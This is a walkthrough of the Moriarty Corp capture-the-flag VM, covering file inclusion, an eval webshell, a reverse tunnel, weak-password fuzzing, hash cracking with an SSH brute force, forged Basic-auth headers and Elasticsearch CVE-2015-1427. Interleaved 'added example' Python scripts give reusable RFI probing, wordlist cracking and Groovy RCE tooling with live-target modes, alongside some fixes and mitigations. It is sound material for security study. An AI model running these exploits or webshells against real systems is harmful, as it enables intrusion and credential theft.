Main knowledge points covered
File inclusion, intranet penetration, webshell upload, weak passwords, privilege change via an HTTP header, an Elasticsearch CVE, brute-force cracking
Network topology
After finishing the writeup I also drew the network topology of the target machine.
Preface
The virtual machine used this time is VirtualBox. It was my first time using it and the configuration took a long time, because the target is an internal network environment and some network settings have to be adjusted by hand.
With the network configured as above, the IPs can be scanned again; the target's IP can be picked out by its MAC address.
Target machine download address:
BoredHackerBlog: Moriarty Corp
Penetration process
IP discovery
The penetration test is done from Windows; Advanced IP Scanner is used to scan the internal network.
The target's IP is identified by its MAC address, and the IP found is then port scanned.
Port scanning
Here the Yujian (御剑) port scanner is used.
Ports 8000 and 9000 look suspicious, so both are opened in a browser.
Web penetration
Accessing port 8000
It is the flag submission page, which also shows the task progress. Submit the first flag as the prompt says.
A new prompt is then shown.
With the help of Baidu Translate and Google Translate it becomes clear: start the penetration from port 80 and submit each flag here. Now access port 80 again.
Access now works, and the penetration is officially underway.
The URL suggests a file inclusion vulnerability, so try to read sensitive files through it.
/etc/passwd is read successfully. Next, build a webshell and check whether the include also accepts a remote file. Remote inclusion only works when PHP's allow_url_include (and allow_url_fopen) is on, which is off by default on modern PHP, so this doubles as a quick configuration check on the target.
The webshell is first hosted on our own server, as a plain text file so that our own server does not execute it:
<?php eval($_REQUEST['pdsdt']); echo 'Welcome Hacker'; phpinfo(); ?>
Try remote file inclusion.
The remote file is included successfully; connect to the webshell with AntSword.
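The LFI-then-RFI check above, written out as a small probe script. This is an added example, not code from the original writeup: the parameter name page, the target URL and the attacker-hosted shell URL are assumptions, and the offline stand-in server is constructed so the probe can be run without a target. Detection keys on the root line of /etc/passwd and on the "Welcome Hacker" marker the webshell prints.

```python
"""Added example: probe a GET parameter for local and remote file inclusion."""
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# A successfully included /etc/passwd shows the root entry somewhere in the body.
PASSWD_RE = re.compile(r"root:[^:\n]*:0:0:")
# The webshell used in the writeup echoes this marker, so it doubles as the RFI check.
RFI_MARKER = "Welcome Hacker"


def lfi_payloads(max_depth=6):
    """Candidate values for the vulnerable parameter, from absolute path to traversal."""
    yield "/etc/passwd"
    for depth in range(1, max_depth + 1):
        yield "../" * depth + "etc/passwd"
    # NUL byte truncation only matters on PHP < 5.3.4; kept for old targets.
    yield "/etc/passwd\x00"


def with_param(url, name, value):
    """Return url with query parameter `name` set to `value`, keeping the other parameters."""
    parts = urlsplit(url)
    query = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True) if k != name]
    query.append((name, value))
    return urlunsplit(parts._replace(query=urlencode(query, safe="/")))


def classify(body):
    """'rfi' if our shell ran, 'lfi' if /etc/passwd leaked, else 'none'."""
    if RFI_MARKER in body:
        return "rfi"
    if PASSWD_RE.search(body):
        return "lfi"
    return "none"


def probe(url, param, fetch, attacker_shell=None):
    """Try each payload through fetch(url) -> body; return (kind, payload) of the first hit.

    attacker_shell is the URL of a hosted webshell (assumed, e.g. http://192.168.1.101/shell.txt);
    it is tried after the local payloads and needs allow_url_include=On on the target.
    """
    candidates = list(lfi_payloads())
    if attacker_shell:
        candidates.append(attacker_shell)
    for payload in candidates:
        kind = classify(fetch(with_param(url, param, payload)))
        if kind != "none":
            return kind, payload
    return "none", None


# Constructed stand-in for the target so the probe runs offline: it "includes" the
# file only when the traversal climbs exactly three levels above its document root.
FAKE_PASSWD = "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33::/var/www:/usr/sbin/nologin\n"


def fake_fetch(url):
    value = dict(parse_qsl(urlsplit(url).query)).get("page", "")
    if value == "../../../etc/passwd":
        return "<html><body>" + FAKE_PASSWD + "</body></html>"
    return "<html><body>Warning: include(): failed to open stream</body></html>"


if __name__ == "__main__":
    import sys
    from urllib.request import urlopen

    if len(sys.argv) >= 3:  # python probe.py "http://target/index.php?page=home" page
        live = lambda u: urlopen(u, timeout=10).read().decode(errors="replace")
        print(probe(sys.argv[1], sys.argv[2], live))
    else:
        print(probe("http://target/index.php?page=home", "page", fake_fetch))
```

Against a live target pass the URL and parameter name on the command line; with no arguments it runs against the constructed stand-in and reports the traversal depth that worked.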
Look for the flag and for hints about the next step.
The flag file is found in the root directory.
Submit it on port 8000; after submission a new hint appears.
The next step is to forward traffic and move into the internal network.
Intranet penetration: setting up the proxy
There are many ways to set up an intranet proxy. MSF could be used for the whole test, but for convenience Venom and Proxifier are used here to forward traffic.
Upload the agent node first.
Start the admin listener on Windows:
admin.exe -lport 9999
On the agent side (the compromised web host), make the binary executable (chmod 777 as done here; chmod +x is enough) and run:
./agent_linux_x64 -rhost 192.168.1.101 -rport 9999
The agent connects back successfully.
Set up the SOCKS5 proxy.
Configure Proxifier to use it.
Try to reach the intranet target through the proxy.
Access succeeds.
Now the actual intranet roaming begins.
First, find the live hosts on the intranet by scanning the network segment given in the hint.
A web page is found on 172.17.0.4.
It is a file upload point that requires a password. Capture the request with Burp and run a common weak-password list against the password field.
With the request captured, fuzz the password.
The upload succeeds when the weak password "password" is tried.
Following the path shown in the response, access our webshell.
Code execution works, so the upload succeeded; connect with AntSword.
Another flag file is found; submit it on port 8000.
The page gives another hint.
We are given a list of usernames and hashed passwords; after cracking the hashes, try logging in over SSH.
username:
root
toor
admin
mcorp
moriarty
password:
63a9f0ea7bb98050796b649e85481845
7b24afc8bc80e548d66c4e7ff72171c5
5f4dcc3b5aa765d61d8327deb882cf99
21232f297a57a5a743894a0e4a801fc3
084e0343a0486ff05530df6c705c8bb4
697c6cc76fdbde5baccb7b3400391e30
8839cfc8a0f24eb155ae3f7f205f5cbc
35ac704fe1cc7807c914af478f20fd35
b27a803ed346fbbf6d2e2eb88df1c51b
08552d48aa6d6d9c05dd67f1b4ba8747
Look the hashes up on cmd5 / somd5 (online MD5 lookup services):
Hash | Plaintext |
---|---|
63a9f0ea7bb98050796b649e85481845 | root |
7b24afc8bc80e548d66c4e7ff72171c5 | toor |
5f4dcc3b5aa765d61d8327deb882cf99 | password |
21232f297a57a5a743894a0e4a801fc3 | admin |
084e0343a0486ff05530df6c705c8bb4 | guest |
697c6cc76fdbde5baccb7b3400391e30 | MORIARTY |
8839cfc8a0f24eb155ae3f7f205f5cbc | MCORP |
35ac704fe1cc7807c914af478f20fd35 | mcorp |
b27a803ed346fbbf6d2e2eb88df1c51b | weapons |
08552d48aa6d6d9c05dd67f1b4ba8747 | moriarty |
Scan the intranet again for hosts with port 22 open.
SSH is open on 172.17.0.5. Build a dictionary from the information obtained and run an SSH brute-force tool against it (Hydra is what finally succeeded).
The credentials obtained are:
root / weapons
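The hash lookup and the dictionary building for the SSH brute force, done offline with hashlib instead of cmd5. This is an added example, not the author's code: the ten hashes are the ones from the hint, the usernames are the ones given, and the extra context words (the earlier upload password, theme words, one classic) are an assumption about what a tester would add. Case and reversal variants are generated automatically, which is how toor falls out of root and MCORP out of mcorp.

```python
"""Added example: crack the hint's MD5 hashes against a dictionary built from the
usernames, then emit the user/password lists for Hydra."""
import hashlib

# The ten hashes exactly as given in the hint.
HASHES = [
    "63a9f0ea7bb98050796b649e85481845",
    "7b24afc8bc80e548d66c4e7ff72171c5",
    "5f4dcc3b5aa765d61d8327deb882cf99",
    "21232f297a57a5a743894a0e4a801fc3",
    "084e0343a0486ff05530df6c705c8bb4",
    "697c6cc76fdbde5baccb7b3400391e30",
    "8839cfc8a0f24eb155ae3f7f205f5cbc",
    "35ac704fe1cc7807c914af478f20fd35",
    "b27a803ed346fbbf6d2e2eb88df1c51b",
    "08552d48aa6d6d9c05dd67f1b4ba8747",
]
USERNAMES = ["root", "toor", "admin", "mcorp", "moriarty"]
# Assumed extra candidates: the upload password found earlier, theme words, one classic.
CONTEXT_WORDS = ["password", "guest", "weapons", "arms", "123456"]


def variants(word):
    """Case and reversal variants of a word (root -> toor, mcorp -> MCORP, ...)."""
    seen = set()
    for w in (word, word.lower(), word.upper(), word.capitalize(), word[::-1]):
        if w not in seen:
            seen.add(w)
            yield w


def build_wordlist(seeds):
    """Ordered, de-duplicated candidate list from the seed words and their variants."""
    out = []
    for seed in seeds:
        for v in variants(seed):
            if v not in out:
                out.append(v)
    return out


def crack_md5(hashes, wordlist):
    """Map each hash to its plaintext when a candidate matches; unmatched hashes are absent."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {h: table[h] for h in hashes if h in table}


def hydra_lists(cracked, usernames):
    """Contents of users.txt and passwords.txt for hydra -L users.txt -P passwords.txt ssh://host."""
    passwords = list(dict.fromkeys(cracked.values()))  # keep order, drop duplicates
    return "\n".join(usernames) + "\n", "\n".join(passwords) + "\n"


if __name__ == "__main__":
    cracked = crack_md5(HASHES, build_wordlist(USERNAMES + CONTEXT_WORDS))
    for h in HASHES:
        print(h, "->", cracked.get(h, "(not cracked)"))
    users, passwords = hydra_lists(cracked, USERNAMES)
    with open("users.txt", "w") as f:
        f.write(users)
    with open("passwords.txt", "w") as f:
        f.write(passwords)
```

Running it prints every hash beside its plaintext (or "not cracked" when the candidate list missed it) and writes users.txt and passwords.txt, which go straight into hydra -L users.txt -P passwords.txt ssh://172.17.0.5. The same candidate list is also a better starting point for the upload-password fuzz earlier than a generic weak-password list.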
Log in with Xshell.
Another flag is obtained.
Submit it on port 8000 to get the next hint.
There is also a chat application on the intranet, not on port 80, so scan the specified ports. An account is given as well, and the task is to get the admin user's chat records.
Port 8000 on 172.17.0.6 is open.
The page asks for a login; log in with the account from the hint:
Here are the credentials our agent has obtained from another source:
username: buyer13
password: arms13
Login succeeds.
The site has two functions: view chat history and change password. Open the change-password page and capture the request to see whether another user's password can be reset.
Try changing the user name to admin.
Inspecting the request, the Authorization header stands out:
Authorization: Basic YnV5ZXIxMzphcm1zMTM=
Decoding the base64 gives buyer13:arms13. HTTP Basic auth is only encoded, not encrypted, so anyone who sees the header has the credentials.
Since the header is just username:password, construct an admin identity and send the change-password request with it, setting the new password to admin:
Authorization: Basic YWRtaW46YWRtaW4=
Go back to the web page and log in as admin with the new password (or keep using the modified header).
Login as admin succeeds and the chat records are accessible.
Get the flag and submit it.
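What the Authorization header actually carries, and the server-side mistake that let the forged header work, as an added example that is not part of the original writeup. The user table is constructed, and the assumption that the application identified the account by the Basic username without verifying the password is the simplest reading of the fact that an admin:admin header was enough to reset the admin password. The vulnerable handler is shown beside one that authenticates the header first.

```python
"""Added example: decode/forge HTTP Basic credentials and contrast a password-change
handler that trusts the header's username with one that verifies it."""
import base64
import hmac


def parse_basic(header):
    """Decode 'Basic <b64(user:pass)>' into (user, pass); None if it is not valid Basic auth."""
    scheme, _, token = header.strip().partition(" ")
    if scheme != "Basic":
        return None
    try:
        user, _, password = base64.b64decode(token, validate=True).decode().partition(":")
    except (ValueError, UnicodeDecodeError):
        return None
    return user, password


def make_basic(user, password):
    """Build the header value for user:password (what we sent to become admin)."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def change_password_vulnerable(users, auth_header, new_password):
    """Identifies the account by the header's username only; the password is never checked."""
    creds = parse_basic(auth_header)
    if creds is None or creds[0] not in users:
        return 401
    users[creds[0]] = new_password
    return 200


def change_password_fixed(users, auth_header, new_password):
    """Authenticates the header first; an account can then only change its own password."""
    creds = parse_basic(auth_header)
    if creds is None:
        return 401
    user, password = creds
    stored = users.get(user, "")
    if not stored or not hmac.compare_digest(stored.encode(), password.encode()):
        return 401
    users[user] = new_password
    return 200


def demo():
    """Replay the forged admin:admin header against both handlers; returns (status, admin password) for each."""
    before = {"buyer13": "arms13", "admin": "not-on-the-page"}  # constructed user table
    forged = make_basic("admin", "admin")
    vuln, fixed = dict(before), dict(before)
    return (
        (change_password_vulnerable(vuln, forged, "admin"), vuln["admin"]),
        (change_password_fixed(fixed, forged, "admin"), fixed["admin"]),
    )


if __name__ == "__main__":
    print(parse_basic("Basic YnV5ZXIxMzphcm1zMTM="))  # header captured in Burp
    print(make_basic("admin", "admin"))                 # header we forged
    print(demo())
```

The fixed version still has Basic auth's inherent weakness (credentials in every request, trivially decoded), but it no longer lets a client name an arbitrary account; hmac.compare_digest is used so the password check does not leak timing.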
After looking around for a while: isn't this Elasticsearch? It is exactly what I have been using in a recent project, a lucky coincidence. Scan the network segment for port 9200.
Opening the page shows the standard Elasticsearch response.
Try the Elasticsearch arbitrary code execution vulnerability (the Groovy scripting sandbox bypass, CVE-2015-1427, affecting 1.3.0 to 1.3.7 and 1.4.0 to 1.4.2).
First create a document, because script_fields only run against search hits and an empty cluster returns nothing:
POST /mitian/mitian6/ HTTP/1.1
Host: 172.17.0.7:9200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
Content-Type: text/plain
Content-Length: 17
Connection: close

{"name": "PDSDT"}
Then send the search request with a Groovy script field; the quotes inside the script must be escaped for JSON:
POST /_search?pretty HTTP/1.1
Host: 172.17.0.7:9200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
Content-Type: text/plain
Content-Length: 156
Connection: close

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"ls\").getText()"}}}
The command executes successfully; read the flag.
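The same Groovy script_fields trick as a reusable query builder and response parser, with the version check a tester should do before firing it. This is an added example, not code from the writeup: the default host and port are the ones used above, the sample response is constructed, and the field name lupin is kept from the request. As in the writeup, at least one document must exist, because script fields are evaluated per hit.

```python
"""Added example: Elasticsearch Groovy script RCE (CVE-2015-1427) query builder, response
parser and version check."""
import http.client
import json


def is_groovy_rce_version(version):
    """CVE-2015-1427 affects Elasticsearch 1.3.0-1.3.7 and 1.4.0-1.4.2 (fixed in 1.3.8 / 1.4.3)."""
    parts = tuple(int(p) for p in version.split(".")[:3])
    return (1, 3, 0) <= parts <= (1, 3, 7) or (1, 4, 0) <= parts <= (1, 4, 2)


def groovy_rce_query(command, field="lupin"):
    """Build the _search body whose script_fields entry runs `command` through Runtime.exec."""
    if '"' in command or "\\" in command:
        raise ValueError("command is embedded in a Groovy string literal; quotes/backslashes not supported")
    script = (
        'java.lang.Math.class.forName("java.lang.Runtime")'
        '.getRuntime().exec("%s").getText()' % command
    )
    return {"size": 1, "script_fields": {field: {"lang": "groovy", "script": script}}}


def command_output(response, field="lupin"):
    """Pull the script field out of the first hit; None if the search returned no hits."""
    hits = response.get("hits", {}).get("hits", [])
    if not hits:
        return None
    values = hits[0].get("fields", {}).get(field) or [None]
    return values[0]


def run(host, port, command):
    """Send the query over plain HTTP (through the SOCKS proxy when Proxifier wraps python)."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("POST", "/_search?pretty", body=json.dumps(groovy_rce_query(command)),
                 headers={"Content-Type": "application/json"})
    response = json.loads(conn.getresponse().read())
    conn.close()
    return command_output(response)


# Constructed sample of what a vulnerable node returns for exec("ls") against one document.
SAMPLE_RESPONSE = {
    "took": 3, "timed_out": False,
    "hits": {"total": 1, "max_score": 1.0, "hits": [
        {"_index": "mitian", "_type": "mitian6", "_id": "1", "_score": 1.0,
         "fields": {"lupin": ["flag.txt\nlogs\n"]}}]},
}

if __name__ == "__main__":
    print(json.dumps(groovy_rce_query("ls")))
    print(command_output(SAMPLE_RESPONSE))
    # print(run("172.17.0.7", 9200, "ls"))  # the live target from the writeup
```

Runtime.exec splits the string on whitespace, so a pipeline or redirection has to be wrapped as a shell invocation. On the defensive side the vendor's workaround for this CVE was script.groovy.sandbox.enabled: false in elasticsearch.yml, and upgrading to 1.3.8 or 1.4.3 removed the bypass; an Elasticsearch node reachable from untrusted networks with dynamic scripting on should be treated as remote code execution regardless of version.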
The flag file is obtained and submitted.
The mission shows as complete, and our IP has been added to the blacklist. Really nice.
Conclusion
This box took most of my time at the start, adjusting the network configuration; none of the individual hosts was very hard. What matters is forwarding traffic with the right tools so that port scanning and service brute forcing work inside the internal network. The overall takeaway is good, although it is quite different from a real environment. Since I have recently been using Elasticsearch in a project, I also took this opportunity to learn more about Elasticsearch-related vulnerabilities.